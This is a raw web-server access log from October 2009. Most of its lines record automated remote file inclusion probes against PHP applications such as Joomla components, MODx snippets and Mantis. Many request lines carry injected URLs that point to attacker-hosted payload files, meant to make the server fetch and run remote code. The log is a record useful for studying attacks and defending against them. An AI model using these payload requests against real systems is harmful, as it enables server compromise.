62.140.23.192 - - [06/Oct/2009:01:35:43 -0400] "GET /logs/access_log.Q109053100/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:35:44 -0400] "GET /logs/access_log.Q109053100/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:35:47 -0400] "GET /logs/access_log.Q109060500/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:35:48 -0400] "GET /logs/access_log.Q109060500/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:35:51 -0400] "GET /logs/access_log.Q109053100/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:35:52 -0400] "GET /logs/error_log.Q109070300 HTTP/1.0" 200 2949061 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.140.23.192 - - [06/Oct/2009:01:35:56 -0400] "GET /logs/access_log.Q109060500/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:36:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.112.120 - - [06/Oct/2009:01:35:53 -0400] "GET /logs/error_log.Q109070300 HTTP/1.0" 200 2949061 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.23.4 - - [06/Oct/2009:01:36:27 -0400] "GET /logs/access_log.Q109071600///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
206.225.23.4 - - [06/Oct/2009:01:36:28 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
206.225.23.4 - - [06/Oct/2009:01:36:28 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 200 20720 "-" "libwww-perl/5.805"
67.195.112.120 - - [06/Oct/2009:01:35:53 -0400] "GET /logs/access_log.Q109092900 HTTP/1.0" 200 5348842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.40.68.132 - - [06/Oct/2009:01:37:25 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:25 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:25 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:25 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:25 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:25 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:29 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:29 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:29 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:29 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:29 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:29 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:32 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:37:33 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:37:14 -0400] "GET /logs/access_log.Q109050800 HTTP/1.0" 200 5406893 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.23.4 - - [06/Oct/2009:01:38:14 -0400] "GET /logs/error_log.Q109090500///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
218.234.19.49 - - [06/Oct/2009:01:38:35 -0400] "GET /index.php?redir=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:38:36 -0400] "GET /logs/access_log.Q109090100/index.php?redir=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:38:36 -0400] "GET /logs/index.php?redir=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:38:36 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Oct/2009:01:38:45 -0400] "GET /logs/config.php?path_to_root?dir=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.6.232.171 - - [06/Oct/2009:01:38:45 -0400] "GET /logs/access_log.Q109051300/config.php?path_to_root?dir=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.6.232.171 - - [06/Oct/2009:01:38:45 -0400] "GET /config.php?path_to_root?dir=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.6.232.171 - - [06/Oct/2009:01:38:49 -0400] "GET /logs/access_log.Q109051300/config.php?path_to_root?dir=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
64.6.232.171 - - [06/Oct/2009:01:38:49 -0400] "GET /config.php?path_to_root?dir=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
64.6.232.171 - - [06/Oct/2009:01:38:49 -0400] "GET /logs/config.php?path_to_root?dir=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
58.184.252.3 - - [06/Oct/2009:01:39:00 -0400] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:39:00 -0400] "GET /logs/access_log.Q109070800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:39:00 -0400] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:04 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:04 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:04 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:13 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:13 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:13 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:14 -0400] "GET /logs/access_log.Q109080200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:01:39:23 -0400] "GET /logs/access_log.Q109080200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.24.238.108 - - [06/Oct/2009:01:39:31 -0400] "GET /logs/error_log.Q108022500 HTTP/1.1" 404 223 "http://www.google.com/search?q=sambis%2eru&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=57&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)Accept-Encoding: gzip, deflate"
95.24.238.108 - - [06/Oct/2009:01:39:35 -0400] "GET /logs/error_log.Q108022500 HTTP/1.1" 404 223 "http://www.google.com/search?q=sambis%2eru&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=57&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)Accept-Encoding: gzip, deflate"
58.184.252.3 - - [06/Oct/2009:01:39:56 -0400] "GET /logs/access_log.Q109080400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:40:02 -0400] "GET /logs/error_log.Q109090500 HTTP/1.0" 200 3197489 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.226 - - [06/Oct/2009:01:40:04 -0400] "GET /logs/error_log.Q109050700 HTTP/1.1" 200 276616 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.112.120 - - [06/Oct/2009:01:40:18 -0400] "GET /logs/error_log.Q109080800 HTTP/1.0" 200 3237840 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:40:04 -0400] "GET /logs/error_log.Q109090500 HTTP/1.0" 200 3197489 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:40:20 -0400] "GET /logs/error_log.Q109080800 HTTP/1.0" 200 3237840 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Oct/2009:01:41:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.211.213.156 - - [06/Oct/2009:01:41:55 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
87.211.213.156 - - [06/Oct/2009:01:41:55 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.111.176.62 - - [06/Oct/2009:01:41:55 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 242 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
218.234.19.49 - - [06/Oct/2009:01:41:55 -0400] "GET /logs/access_log.Q109070300//?sIncPath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:41:55 -0400] "GET //?sIncPath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.111.176.62 - - [06/Oct/2009:01:41:56 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
218.234.19.49 - - [06/Oct/2009:01:41:55 -0400] "GET /logs//?sIncPath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:01:42:34 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.143.3.188 - - [06/Oct/2009:01:42:35 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
174.143.3.188 - - [06/Oct/2009:01:42:46 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Microsoft Pocket Internet Explorer/0.6"
174.143.3.188 - - [06/Oct/2009:01:42:46 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
206.225.23.4 - - [06/Oct/2009:01:42:57 -0400] "GET ///dm-albums/template/album.php?SECURITY_FILE=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
218.234.19.49 - - [06/Oct/2009:01:43:27 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:43:27 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:43:27 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:43:31 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:43:35 -0400] "GET //?sIncPath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:43:35 -0400] "GET /logs/access_log.Q109070300%20%20//?sIncPath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:43:35 -0400] "GET /logs//?sIncPath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
174.37.136.126 - - [06/Oct/2009:01:45:12 -0400] "GET /logs/access_log.Q109091200//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [06/Oct/2009:01:45:22 -0400] "GET /logs/access_log.Q109071400///dm-albums/template/album.php?SECURITY_FILE=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
206.225.23.4 - - [06/Oct/2009:01:45:22 -0400] "GET ///dm-albums/template/album.php?SECURITY_FILE=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
206.225.23.4 - - [06/Oct/2009:01:45:22 -0400] "GET /logs///dm-albums/template/album.php?SECURITY_FILE=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
174.37.136.126 - - [06/Oct/2009:01:45:37 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
204.11.17.16 - - [06/Oct/2009:01:45:44 -0400] "GET /include/bbs.lib.inc.php?site_path=http://www.dcpeek.com/perl_calendar/docs//tools/story.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
218.234.19.49 - - [06/Oct/2009:01:45:57 -0400] "GET /logs/access_log.Q109062900%20%20//?sIncPath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:46:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.62.196.11 - - [06/Oct/2009:01:46:50 -0400] "GET /logs/access_log.Q109051100/My_eGallery/index.php?basepath=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:01:47:03 -0400] "GET /logs/access_log.Q109050800/My_eGallery/index.php?basepath=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
199.238.165.123 - - [06/Oct/2009:01:48:18 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
199.238.165.123 - - [06/Oct/2009:01:48:18 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
199.238.165.123 - - [06/Oct/2009:01:48:19 -0400] "GET /logs/access_log.Q109092200%20%20/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
199.238.165.123 - - [06/Oct/2009:01:48:42 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
199.238.165.123 - - [06/Oct/2009:01:48:42 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
199.238.165.123 - - [06/Oct/2009:01:48:42 -0400] "GET /logs/access_log.Q109092200/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.23.4 - - [06/Oct/2009:01:49:14 -0400] "GET /logs/error_log.Q109071400///dm-albums/template/album.php?SECURITY_FILE=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
218.234.19.49 - - [06/Oct/2009:01:49:55 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:49:55 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:49:55 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:49:55 -0400] "GET /logs/access_log.Q109081300/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:50:37 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:50:37 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:50:37 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:50:58 -0400] "GET /logs/access_log.Q109061900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:51:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.184.252.3 - - [06/Oct/2009:01:51:28 -0400] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:51:28 -0400] "GET /logs/access_log.Q109070800%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:51:28 -0400] "GET /logs/access_log.Q109080400%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:51:28 -0400] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:12 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:52:12 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:52:12 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:52:12 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:12 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:15 -0400] "GET /logs/access_log.Q109092200%20%20/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:52:20 -0400] "GET /logs/access_log.Q109081300/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:20 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:20 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:21 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:24 -0400] "GET /logs/access_log.Q109092200%20%20/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:24 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:24 -0400] "GET /logs/access_log.Q109092200%20%20/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:34 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:34 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
